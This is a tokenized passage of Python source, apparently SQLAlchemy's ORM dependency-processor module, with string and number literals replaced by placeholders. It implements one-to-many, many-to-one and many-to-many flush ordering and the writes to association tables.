. 
primary_base_mapper <EOL> ) <EOL> child_saves = unitofwork . SaveUpdateAll ( <EOL> uow , <EOL> self . mapper . primary_base_mapper <EOL> ) <EOL> parent_deletes = unitofwork . DeleteAll ( <EOL> uow , <EOL> self . parent . primary_base_mapper <EOL> ) <EOL> child_deletes = unitofwork . DeleteAll ( <EOL> uow , <EOL> self . mapper . primary_base_mapper <EOL> ) <EOL> self . per_property_dependencies ( uow , <EOL> parent_saves , <EOL> child_saves , <EOL> parent_deletes , <EOL> child_deletes , <EOL> after_save , <EOL> before_delete <EOL> ) <EOL> def per_state_flush_actions ( self , uow , states , isdelete ) : <EOL> """<STR_LIT>""" <EOL> parent_base_mapper = self . parent . primary_base_mapper <EOL> child_base_mapper = self . mapper . primary_base_mapper <EOL> child_saves = unitofwork . SaveUpdateAll ( uow , child_base_mapper ) <EOL> child_deletes = unitofwork . DeleteAll ( uow , child_base_mapper ) <EOL> if isdelete : <EOL> before_delete = unitofwork . ProcessAll ( uow , self , True , True ) <EOL> before_delete . disabled = True <EOL> else : <EOL> after_save = unitofwork . ProcessAll ( uow , self , False , True ) <EOL> after_save . disabled = True <EOL> if child_saves not in uow . cycles : <EOL> assert child_deletes not in uow . cycles <EOL> child_actions = [ <EOL> ( child_saves , False ) , ( child_deletes , True ) <EOL> ] <EOL> child_in_cycles = False <EOL> else : <EOL> child_in_cycles = True <EOL> if not isdelete : <EOL> parent_saves = unitofwork . SaveUpdateAll ( <EOL> uow , <EOL> self . parent . base_mapper ) <EOL> parent_deletes = before_delete = None <EOL> if parent_saves in uow . cycles : <EOL> parent_in_cycles = True <EOL> else : <EOL> parent_deletes = unitofwork . DeleteAll ( <EOL> uow , <EOL> self . parent . base_mapper ) <EOL> parent_saves = after_save = None <EOL> if parent_deletes in uow . cycles : <EOL> parent_in_cycles = True <EOL> for state in states : <EOL> sum_ = state . manager [ self . key ] . impl . get_all_pending ( <EOL> state , state . 
dict , <EOL> self . _passive_delete_flag <EOL> if isdelete <EOL> else attributes . PASSIVE_NO_INITIALIZE ) <EOL> if not sum_ : <EOL> continue <EOL> if isdelete : <EOL> before_delete = unitofwork . ProcessState ( uow , <EOL> self , True , state ) <EOL> if parent_in_cycles : <EOL> parent_deletes = unitofwork . DeleteState ( <EOL> uow , <EOL> state , <EOL> parent_base_mapper ) <EOL> else : <EOL> after_save = unitofwork . ProcessState ( uow , self , False , state ) <EOL> if parent_in_cycles : <EOL> parent_saves = unitofwork . SaveUpdateState ( <EOL> uow , <EOL> state , <EOL> parent_base_mapper ) <EOL> if child_in_cycles : <EOL> child_actions = [ ] <EOL> for child_state , child in sum_ : <EOL> if child_state not in uow . states : <EOL> child_action = ( None , None ) <EOL> else : <EOL> ( deleted , listonly ) = uow . states [ child_state ] <EOL> if deleted : <EOL> child_action = ( <EOL> unitofwork . DeleteState ( <EOL> uow , child_state , <EOL> child_base_mapper ) , <EOL> True ) <EOL> else : <EOL> child_action = ( <EOL> unitofwork . SaveUpdateState ( <EOL> uow , child_state , <EOL> child_base_mapper ) , <EOL> False ) <EOL> child_actions . append ( child_action ) <EOL> for child_action , childisdelete in child_actions : <EOL> self . per_state_dependencies ( uow , parent_saves , <EOL> parent_deletes , <EOL> child_action , <EOL> after_save , before_delete , <EOL> isdelete , childisdelete ) <EOL> def presort_deletes ( self , uowcommit , states ) : <EOL> return False <EOL> def presort_saves ( self , uowcommit , states ) : <EOL> return False <EOL> def process_deletes ( self , uowcommit , states ) : <EOL> pass <EOL> def process_saves ( self , uowcommit , states ) : <EOL> pass <EOL> def prop_has_changes ( self , uowcommit , states , isdelete ) : <EOL> if not isdelete or self . passive_deletes : <EOL> passive = attributes . PASSIVE_NO_INITIALIZE <EOL> elif self . direction is MANYTOONE : <EOL> passive = attributes . 
PASSIVE_NO_FETCH_RELATED <EOL> else : <EOL> passive = attributes . PASSIVE_OFF <EOL> for s in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> s , <EOL> self . key , <EOL> passive ) <EOL> if history and not history . empty ( ) : <EOL> return True <EOL> else : <EOL> return states and not self . prop . _is_self_referential and self . mapper in uowcommit . mappers <EOL> def _verify_canload ( self , state ) : <EOL> if self . prop . uselist and state is None : <EOL> raise exc . FlushError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( self . prop , ) ) <EOL> elif state is not None and not self . mapper . _canload ( <EOL> state , allow_subtypes = not self . enable_typechecks ) : <EOL> if self . mapper . _canload ( state , allow_subtypes = True ) : <EOL> raise exc . FlushError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % { <EOL> '<STR_LIT:x>' : state . class_ , <EOL> '<STR_LIT:y>' : self . prop , <EOL> '<STR_LIT:z>' : self . mapper . class_ , <EOL> '<STR_LIT>' : self . mapper , <EOL> } ) <EOL> else : <EOL> raise exc . FlushError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % { <EOL> '<STR_LIT:x>' : state . class_ , <EOL> '<STR_LIT:y>' : self . prop , <EOL> '<STR_LIT:z>' : self . mapper . class_ , <EOL> } ) <EOL> def _synchronize ( self , state , child , associationrow , <EOL> clearkeys , uowcommit ) : <EOL> raise NotImplementedError ( ) <EOL> def _get_reversed_processed_set ( self , uow ) : <EOL> if not self . prop . _reverse_property : <EOL> return None <EOL> process_key = tuple ( sorted ( <EOL> [ self . key ] + <EOL> [ p . key for p in self . prop . _reverse_property ] <EOL> ) ) <EOL> return uow . 
memo ( <EOL> ( '<STR_LIT>' , process_key ) , <EOL> set <EOL> ) <EOL> def _post_update ( self , state , uowcommit , related , is_m2o_delete = False ) : <EOL> for x in related : <EOL> if not is_m2o_delete or x is not None : <EOL> uowcommit . issue_post_update ( <EOL> state , <EOL> [ r for l , r in self . prop . synchronize_pairs ] <EOL> ) <EOL> break <EOL> def _pks_changed ( self , uowcommit , state ) : <EOL> raise NotImplementedError ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . prop ) <EOL> class OneToManyDP ( DependencyProcessor ) : <EOL> def per_property_dependencies ( self , uow , parent_saves , <EOL> child_saves , <EOL> parent_deletes , <EOL> child_deletes , <EOL> after_save , <EOL> before_delete , <EOL> ) : <EOL> if self . post_update : <EOL> child_post_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . mapper . primary_base_mapper , <EOL> False ) <EOL> child_pre_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . mapper . primary_base_mapper , <EOL> True ) <EOL> uow . dependencies . update ( [ <EOL> ( child_saves , after_save ) , <EOL> ( parent_saves , after_save ) , <EOL> ( after_save , child_post_updates ) , <EOL> ( before_delete , child_pre_updates ) , <EOL> ( child_pre_updates , parent_deletes ) , <EOL> ( child_pre_updates , child_deletes ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( parent_saves , after_save ) , <EOL> ( after_save , child_saves ) , <EOL> ( after_save , child_deletes ) , <EOL> ( child_saves , parent_deletes ) , <EOL> ( child_deletes , parent_deletes ) , <EOL> ( before_delete , child_saves ) , <EOL> ( before_delete , child_deletes ) , <EOL> ] ) <EOL> def per_state_dependencies ( self , uow , <EOL> save_parent , <EOL> delete_parent , <EOL> child_action , <EOL> after_save , before_delete , <EOL> isdelete , childisdelete ) : <EOL> if self . post_update : <EOL> child_post_updates = unitofwork . 
IssuePostUpdate ( <EOL> uow , <EOL> self . mapper . primary_base_mapper , <EOL> False ) <EOL> child_pre_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . mapper . primary_base_mapper , <EOL> True ) <EOL> if not isdelete : <EOL> if childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( child_action , after_save ) , <EOL> ( after_save , child_post_updates ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( save_parent , after_save ) , <EOL> ( child_action , after_save ) , <EOL> ( after_save , child_post_updates ) , <EOL> ] ) <EOL> else : <EOL> if childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( before_delete , child_pre_updates ) , <EOL> ( child_pre_updates , delete_parent ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( before_delete , child_pre_updates ) , <EOL> ( child_pre_updates , delete_parent ) , <EOL> ] ) <EOL> elif not isdelete : <EOL> uow . dependencies . update ( [ <EOL> ( save_parent , after_save ) , <EOL> ( after_save , child_action ) , <EOL> ( save_parent , child_action ) <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( before_delete , child_action ) , <EOL> ( child_action , delete_parent ) <EOL> ] ) <EOL> def presort_deletes ( self , uowcommit , states ) : <EOL> should_null_fks = not self . cascade . delete and not self . passive_deletes == '<STR_LIT:all>' <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> for child in history . deleted : <EOL> if child is not None and self . hasparent ( child ) is False : <EOL> if self . cascade . delete_orphan : <EOL> uowcommit . register_object ( child , isdelete = True ) <EOL> else : <EOL> uowcommit . register_object ( child ) <EOL> if should_null_fks : <EOL> for child in history . unchanged : <EOL> if child is not None : <EOL> uowcommit . 
register_object ( <EOL> child , operation = "<STR_LIT>" , prop = self . prop ) <EOL> def presort_saves ( self , uowcommit , states ) : <EOL> children_added = uowcommit . memo ( ( '<STR_LIT>' , self ) , set ) <EOL> for state in states : <EOL> pks_changed = self . _pks_changed ( uowcommit , state ) <EOL> if not pks_changed or self . passive_updates : <EOL> passive = attributes . PASSIVE_NO_INITIALIZE <EOL> else : <EOL> passive = attributes . PASSIVE_OFF <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> passive ) <EOL> if history : <EOL> for child in history . added : <EOL> if child is not None : <EOL> uowcommit . register_object ( child , cancel_delete = True , <EOL> operation = "<STR_LIT>" , <EOL> prop = self . prop ) <EOL> children_added . update ( history . added ) <EOL> for child in history . deleted : <EOL> if not self . cascade . delete_orphan : <EOL> uowcommit . register_object ( child , isdelete = False , <EOL> operation = '<STR_LIT>' , <EOL> prop = self . prop ) <EOL> elif self . hasparent ( child ) is False : <EOL> uowcommit . register_object ( <EOL> child , isdelete = True , <EOL> operation = "<STR_LIT>" , prop = self . prop ) <EOL> for c , m , st_ , dct_ in self . mapper . cascade_iterator ( <EOL> '<STR_LIT>' , child ) : <EOL> uowcommit . register_object ( <EOL> st_ , <EOL> isdelete = True ) <EOL> if pks_changed : <EOL> if history : <EOL> for child in history . unchanged : <EOL> if child is not None : <EOL> uowcommit . register_object ( <EOL> child , <EOL> False , <EOL> self . passive_updates , <EOL> operation = "<STR_LIT>" , <EOL> prop = self . prop ) <EOL> def process_deletes ( self , uowcommit , states ) : <EOL> if self . post_update or not self . passive_deletes == '<STR_LIT:all>' : <EOL> children_added = uowcommit . memo ( ( '<STR_LIT>' , self ) , set ) <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . 
_passive_delete_flag ) <EOL> if history : <EOL> for child in history . deleted : <EOL> if child is not None and self . hasparent ( child ) is False : <EOL> self . _synchronize ( <EOL> state , <EOL> child , <EOL> None , True , <EOL> uowcommit , False ) <EOL> if self . post_update and child : <EOL> self . _post_update ( child , uowcommit , [ state ] ) <EOL> if self . post_update or not self . cascade . delete : <EOL> for child in set ( history . unchanged ) . difference ( children_added ) : <EOL> if child is not None : <EOL> self . _synchronize ( <EOL> state , <EOL> child , <EOL> None , True , <EOL> uowcommit , False ) <EOL> if self . post_update and child : <EOL> self . _post_update ( child , <EOL> uowcommit , <EOL> [ state ] ) <EOL> def process_saves ( self , uowcommit , states ) : <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> attributes . PASSIVE_NO_INITIALIZE ) <EOL> if history : <EOL> for child in history . added : <EOL> self . _synchronize ( state , child , None , <EOL> False , uowcommit , False ) <EOL> if child is not None and self . post_update : <EOL> self . _post_update ( child , uowcommit , [ state ] ) <EOL> for child in history . deleted : <EOL> if not self . cascade . delete_orphan and not self . hasparent ( child ) : <EOL> self . _synchronize ( state , child , None , True , <EOL> uowcommit , False ) <EOL> if self . _pks_changed ( uowcommit , state ) : <EOL> for child in history . unchanged : <EOL> self . _synchronize ( state , child , None , <EOL> False , uowcommit , True ) <EOL> def _synchronize ( self , state , child , <EOL> associationrow , clearkeys , uowcommit , <EOL> pks_changed ) : <EOL> source = state <EOL> dest = child <EOL> self . _verify_canload ( child ) <EOL> if dest is None or ( not self . post_update and uowcommit . is_deleted ( dest ) ) : <EOL> return <EOL> if clearkeys : <EOL> sync . clear ( dest , self . mapper , self . prop . 
synchronize_pairs ) <EOL> else : <EOL> sync . populate ( source , self . parent , dest , self . mapper , <EOL> self . prop . synchronize_pairs , uowcommit , <EOL> self . passive_updates and pks_changed ) <EOL> def _pks_changed ( self , uowcommit , state ) : <EOL> return sync . source_modified ( <EOL> uowcommit , <EOL> state , <EOL> self . parent , <EOL> self . prop . synchronize_pairs ) <EOL> class ManyToOneDP ( DependencyProcessor ) : <EOL> def __init__ ( self , prop ) : <EOL> DependencyProcessor . __init__ ( self , prop ) <EOL> self . mapper . _dependency_processors . append ( DetectKeySwitch ( prop ) ) <EOL> def per_property_dependencies ( self , uow , <EOL> parent_saves , <EOL> child_saves , <EOL> parent_deletes , <EOL> child_deletes , <EOL> after_save , <EOL> before_delete ) : <EOL> if self . post_update : <EOL> parent_post_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . parent . primary_base_mapper , <EOL> False ) <EOL> parent_pre_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . parent . primary_base_mapper , <EOL> True ) <EOL> uow . dependencies . update ( [ <EOL> ( child_saves , after_save ) , <EOL> ( parent_saves , after_save ) , <EOL> ( after_save , parent_post_updates ) , <EOL> ( after_save , parent_pre_updates ) , <EOL> ( before_delete , parent_pre_updates ) , <EOL> ( parent_pre_updates , child_deletes ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( child_saves , after_save ) , <EOL> ( after_save , parent_saves ) , <EOL> ( parent_saves , child_deletes ) , <EOL> ( parent_deletes , child_deletes ) <EOL> ] ) <EOL> def per_state_dependencies ( self , uow , <EOL> save_parent , <EOL> delete_parent , <EOL> child_action , <EOL> after_save , before_delete , <EOL> isdelete , childisdelete ) : <EOL> if self . post_update : <EOL> if not isdelete : <EOL> parent_post_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . parent . 
primary_base_mapper , <EOL> False ) <EOL> if childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( after_save , parent_post_updates ) , <EOL> ( parent_post_updates , child_action ) <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( save_parent , after_save ) , <EOL> ( child_action , after_save ) , <EOL> ( after_save , parent_post_updates ) <EOL> ] ) <EOL> else : <EOL> parent_pre_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . parent . primary_base_mapper , <EOL> True ) <EOL> uow . dependencies . update ( [ <EOL> ( before_delete , parent_pre_updates ) , <EOL> ( parent_pre_updates , delete_parent ) , <EOL> ( parent_pre_updates , child_action ) <EOL> ] ) <EOL> elif not isdelete : <EOL> if not childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( child_action , after_save ) , <EOL> ( after_save , save_parent ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( after_save , save_parent ) , <EOL> ] ) <EOL> else : <EOL> if childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( delete_parent , child_action ) <EOL> ] ) <EOL> def presort_deletes ( self , uowcommit , states ) : <EOL> if self . cascade . delete or self . cascade . delete_orphan : <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> if self . cascade . delete_orphan : <EOL> todelete = history . sum ( ) <EOL> else : <EOL> todelete = history . non_deleted ( ) <EOL> for child in todelete : <EOL> if child is None : <EOL> continue <EOL> uowcommit . register_object ( <EOL> child , isdelete = True , <EOL> operation = "<STR_LIT>" , prop = self . prop ) <EOL> t = self . mapper . cascade_iterator ( '<STR_LIT>' , child ) <EOL> for c , m , st_ , dct_ in t : <EOL> uowcommit . register_object ( <EOL> st_ , isdelete = True ) <EOL> def presort_saves ( self , uowcommit , states ) : <EOL> for state in states : <EOL> uowcommit . 
register_object ( state , operation = "<STR_LIT>" , prop = self . prop ) <EOL> if self . cascade . delete_orphan : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> for child in history . deleted : <EOL> if self . hasparent ( child ) is False : <EOL> uowcommit . register_object ( <EOL> child , isdelete = True , <EOL> operation = "<STR_LIT>" , prop = self . prop ) <EOL> t = self . mapper . cascade_iterator ( '<STR_LIT>' , child ) <EOL> for c , m , st_ , dct_ in t : <EOL> uowcommit . register_object ( st_ , isdelete = True ) <EOL> def process_deletes ( self , uowcommit , states ) : <EOL> if self . post_update and not self . cascade . delete_orphan and not self . passive_deletes == '<STR_LIT:all>' : <EOL> for state in states : <EOL> self . _synchronize ( state , None , None , True , uowcommit ) <EOL> if state and self . post_update : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> self . _post_update ( <EOL> state , uowcommit , history . sum ( ) , <EOL> is_m2o_delete = True ) <EOL> def process_saves ( self , uowcommit , states ) : <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> attributes . PASSIVE_NO_INITIALIZE ) <EOL> if history : <EOL> if history . added : <EOL> for child in history . added : <EOL> self . _synchronize ( state , child , None , False , <EOL> uowcommit , "<STR_LIT>" ) <EOL> if self . post_update : <EOL> self . _post_update ( state , uowcommit , history . sum ( ) ) <EOL> def _synchronize ( self , state , child , associationrow , <EOL> clearkeys , uowcommit , operation = None ) : <EOL> if state is None or ( not self . post_update and uowcommit . is_deleted ( state ) ) : <EOL> return <EOL> if operation is not None and child is not None and not uowcommit . session . 
_contains_state ( child ) : <EOL> util . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( mapperutil . state_class_str ( child ) , operation , self . prop ) ) <EOL> return <EOL> if clearkeys or child is None : <EOL> sync . clear ( state , self . parent , self . prop . synchronize_pairs ) <EOL> else : <EOL> self . _verify_canload ( child ) <EOL> sync . populate ( child , self . mapper , state , <EOL> self . parent , <EOL> self . prop . synchronize_pairs , <EOL> uowcommit , <EOL> False ) <EOL> class DetectKeySwitch ( DependencyProcessor ) : <EOL> """<STR_LIT>""" <EOL> def per_property_preprocessors ( self , uow ) : <EOL> if self . prop . _reverse_property : <EOL> if self . passive_updates : <EOL> return <EOL> else : <EOL> if False in ( prop . passive_updates for <EOL> prop in self . prop . _reverse_property ) : <EOL> return <EOL> uow . register_preprocessor ( self , False ) <EOL> def per_property_flush_actions ( self , uow ) : <EOL> parent_saves = unitofwork . SaveUpdateAll ( <EOL> uow , <EOL> self . parent . base_mapper ) <EOL> after_save = unitofwork . ProcessAll ( uow , self , False , False ) <EOL> uow . dependencies . update ( [ <EOL> ( parent_saves , after_save ) <EOL> ] ) <EOL> def per_state_flush_actions ( self , uow , states , isdelete ) : <EOL> pass <EOL> def presort_deletes ( self , uowcommit , states ) : <EOL> pass <EOL> def presort_saves ( self , uow , states ) : <EOL> if not self . passive_updates : <EOL> self . _process_key_switches ( states , uow ) <EOL> def prop_has_changes ( self , uow , states , isdelete ) : <EOL> if not isdelete and self . passive_updates : <EOL> d = self . _key_switchers ( uow , states ) <EOL> return bool ( d ) <EOL> return False <EOL> def process_deletes ( self , uowcommit , states ) : <EOL> assert False <EOL> def process_saves ( self , uowcommit , states ) : <EOL> assert self . passive_updates <EOL> self . 
_process_key_switches ( states , uowcommit ) <EOL> def _key_switchers ( self , uow , states ) : <EOL> switched , notswitched = uow . memo ( <EOL> ( '<STR_LIT>' , self ) , <EOL> lambda : ( set ( ) , set ( ) ) <EOL> ) <EOL> allstates = switched . union ( notswitched ) <EOL> for s in states : <EOL> if s not in allstates : <EOL> if self . _pks_changed ( uow , s ) : <EOL> switched . add ( s ) <EOL> else : <EOL> notswitched . add ( s ) <EOL> return switched <EOL> def _process_key_switches ( self , deplist , uowcommit ) : <EOL> switchers = self . _key_switchers ( uowcommit , deplist ) <EOL> if switchers : <EOL> for state in uowcommit . session . identity_map . all_states ( ) : <EOL> if not issubclass ( state . class_ , self . parent . class_ ) : <EOL> continue <EOL> dict_ = state . dict <EOL> related = state . get_impl ( self . key ) . get ( <EOL> state , dict_ , passive = self . _passive_update_flag ) <EOL> if related is not attributes . PASSIVE_NO_RESULT and related is not None : <EOL> related_state = attributes . instance_state ( dict_ [ self . key ] ) <EOL> if related_state in switchers : <EOL> uowcommit . register_object ( state , <EOL> False , <EOL> self . passive_updates ) <EOL> sync . populate ( <EOL> related_state , <EOL> self . mapper , state , <EOL> self . parent , self . prop . synchronize_pairs , <EOL> uowcommit , self . passive_updates ) <EOL> def _pks_changed ( self , uowcommit , state ) : <EOL> return bool ( state . key ) and sync . source_modified ( <EOL> uowcommit , state , self . mapper , self . prop . synchronize_pairs ) <EOL> class ManyToManyDP ( DependencyProcessor ) : <EOL> def per_property_dependencies ( self , uow , parent_saves , <EOL> child_saves , <EOL> parent_deletes , <EOL> child_deletes , <EOL> after_save , <EOL> before_delete <EOL> ) : <EOL> uow . dependencies . 
update ( [ <EOL> ( parent_saves , after_save ) , <EOL> ( child_saves , after_save ) , <EOL> ( after_save , child_deletes ) , <EOL> ( before_delete , parent_saves ) , <EOL> ( before_delete , parent_deletes ) , <EOL> ( before_delete , child_deletes ) , <EOL> ( before_delete , child_saves ) , <EOL> ] ) <EOL> def per_state_dependencies ( self , uow , <EOL> save_parent , <EOL> delete_parent , <EOL> child_action , <EOL> after_save , before_delete , <EOL> isdelete , childisdelete ) : <EOL> if not isdelete : <EOL> if childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( save_parent , after_save ) , <EOL> ( after_save , child_action ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( save_parent , after_save ) , <EOL> ( child_action , after_save ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( before_delete , child_action ) , <EOL> ( before_delete , delete_parent ) <EOL> ] ) <EOL> def presort_deletes ( self , uowcommit , states ) : <EOL> if not self . passive_deletes : <EOL> for state in states : <EOL> uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> def presort_saves ( self , uowcommit , states ) : <EOL> if not self . passive_updates : <EOL> for state in states : <EOL> if self . _pks_changed ( uowcommit , state ) : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> attributes . PASSIVE_OFF ) <EOL> if not self . cascade . delete_orphan : <EOL> return <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> attributes . PASSIVE_NO_INITIALIZE ) <EOL> if history : <EOL> for child in history . deleted : <EOL> if self . hasparent ( child ) is False : <EOL> uowcommit . register_object ( <EOL> child , isdelete = True , <EOL> operation = "<STR_LIT>" , prop = self . prop ) <EOL> for c , m , st_ , dct_ in self . mapper . 
cascade_iterator ( <EOL> '<STR_LIT>' , <EOL> child ) : <EOL> uowcommit . register_object ( <EOL> st_ , isdelete = True ) <EOL> def process_deletes ( self , uowcommit , states ) : <EOL> secondary_delete = [ ] <EOL> secondary_insert = [ ] <EOL> secondary_update = [ ] <EOL> processed = self . _get_reversed_processed_set ( uowcommit ) <EOL> tmp = set ( ) <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> for child in history . non_added ( ) : <EOL> if child is None or ( processed is not None and <EOL> ( state , child ) in processed ) : <EOL> continue <EOL> associationrow = { } <EOL> if not self . _synchronize ( <EOL> state , <EOL> child , <EOL> associationrow , <EOL> False , uowcommit , "<STR_LIT>" ) : <EOL> continue <EOL> secondary_delete . append ( associationrow ) <EOL> tmp . update ( ( c , state ) for c in history . non_added ( ) ) <EOL> if processed is not None : <EOL> processed . update ( tmp ) <EOL> self . _run_crud ( uowcommit , secondary_insert , <EOL> secondary_update , secondary_delete ) <EOL> def process_saves ( self , uowcommit , states ) : <EOL> secondary_delete = [ ] <EOL> secondary_insert = [ ] <EOL> secondary_update = [ ] <EOL> processed = self . _get_reversed_processed_set ( uowcommit ) <EOL> tmp = set ( ) <EOL> for state in states : <EOL> need_cascade_pks = not self . passive_updates and self . _pks_changed ( uowcommit , state ) <EOL> if need_cascade_pks : <EOL> passive = attributes . PASSIVE_OFF <EOL> else : <EOL> passive = attributes . PASSIVE_NO_INITIALIZE <EOL> history = uowcommit . get_attribute_history ( state , self . key , <EOL> passive ) <EOL> if history : <EOL> for child in history . added : <EOL> if ( processed is not None and <EOL> ( state , child ) in processed ) : <EOL> continue <EOL> associationrow = { } <EOL> if not self . 
_synchronize ( state , <EOL> child , <EOL> associationrow , <EOL> False , uowcommit , "<STR_LIT>" ) : <EOL> continue <EOL> secondary_insert . append ( associationrow ) <EOL> for child in history . deleted : <EOL> if ( processed is not None and <EOL> ( state , child ) in processed ) : <EOL> continue <EOL> associationrow = { } <EOL> if not self . _synchronize ( state , <EOL> child , <EOL> associationrow , <EOL> False , uowcommit , "<STR_LIT>" ) : <EOL> continue <EOL> secondary_delete . append ( associationrow ) <EOL> tmp . update ( ( c , state ) <EOL> for c in history . added + history . deleted ) <EOL> if need_cascade_pks : <EOL> for child in history . unchanged : <EOL> associationrow = { } <EOL> sync . update ( state , <EOL> self . parent , <EOL> associationrow , <EOL> "<STR_LIT>" , <EOL> self . prop . synchronize_pairs ) <EOL> sync . update ( child , <EOL> self . mapper , <EOL> associationrow , <EOL> "<STR_LIT>" , <EOL> self . prop . secondary_synchronize_pairs ) <EOL> secondary_update . append ( associationrow ) <EOL> if processed is not None : <EOL> processed . update ( tmp ) <EOL> self . _run_crud ( uowcommit , secondary_insert , <EOL> secondary_update , secondary_delete ) <EOL> def _run_crud ( self , uowcommit , secondary_insert , <EOL> secondary_update , secondary_delete ) : <EOL> connection = uowcommit . transaction . connection ( self . mapper ) <EOL> if secondary_delete : <EOL> associationrow = secondary_delete [ <NUM_LIT:0> ] <EOL> statement = self . secondary . delete ( sql . and_ ( * [ <EOL> c == sql . bindparam ( c . key , type_ = c . type ) <EOL> for c in self . secondary . c <EOL> if c . key in associationrow <EOL> ] ) ) <EOL> result = connection . execute ( statement , secondary_delete ) <EOL> if result . supports_sane_multi_rowcount ( ) and result . rowcount != len ( secondary_delete ) : <EOL> raise exc . StaleDataError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( self . secondary . description , len ( secondary_delete ) , <EOL> result . 
rowcount ) <EOL> ) <EOL> if secondary_update : <EOL> associationrow = secondary_update [ <NUM_LIT:0> ] <EOL> statement = self . secondary . update ( sql . and_ ( * [ <EOL> c == sql . bindparam ( "<STR_LIT>" + c . key , type_ = c . type ) <EOL> for c in self . secondary . c <EOL> if c . key in associationrow <EOL> ] ) ) <EOL> result = connection . execute ( statement , secondary_update ) <EOL> if result . supports_sane_multi_rowcount ( ) and result . rowcount != len ( secondary_update ) : <EOL> raise exc . StaleDataError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( self . secondary . description , len ( secondary_update ) , <EOL> result . rowcount ) <EOL> ) <EOL> if secondary_insert : <EOL> statement = self . secondary . insert ( ) <EOL> connection . execute ( statement , secondary_insert ) <EOL> def _synchronize ( self , state , child , associationrow , <EOL> clearkeys , uowcommit , operation ) : <EOL> self . _verify_canload ( child ) <EOL> if child is None : <EOL> return False <EOL> if child is not None and not uowcommit . session . _contains_state ( child ) : <EOL> if not child . deleted : <EOL> util . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( mapperutil . state_class_str ( child ) , operation , self . prop ) ) <EOL> return False <EOL> sync . populate_dict ( state , self . parent , associationrow , <EOL> self . prop . synchronize_pairs ) <EOL> sync . populate_dict ( child , self . mapper , associationrow , <EOL> self . prop . secondary_synchronize_pairs ) <EOL> return True <EOL> def _pks_changed ( self , uowcommit , state ) : <EOL> return sync . source_modified ( <EOL> uowcommit , <EOL> state , <EOL> self . parent , <EOL> self . prop . synchronize_pairs ) <EOL> _direction_to_processor = { <EOL> ONETOMANY : OneToManyDP , <EOL> MANYTOONE : ManyToOneDP , <EOL> MANYTOMANY : ManyToManyDP , <EOL> } </s>
